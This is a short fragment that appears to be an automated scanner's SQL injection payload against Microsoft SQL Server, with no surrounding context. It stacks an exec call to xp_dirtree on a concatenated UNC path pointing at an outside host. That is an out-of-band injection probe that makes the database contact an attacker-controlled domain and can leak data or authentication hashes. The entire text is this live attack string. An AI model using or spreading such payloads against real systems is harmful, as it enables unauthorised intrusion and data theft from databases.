syscolumns WHERE 2>3;exec(‘xp_dirtree ”\\pqhm2ytin0qib_p8orghnaepdgiqb_yju0w6jgq9’+’4mg.r87.me’+’\c$\a”’)–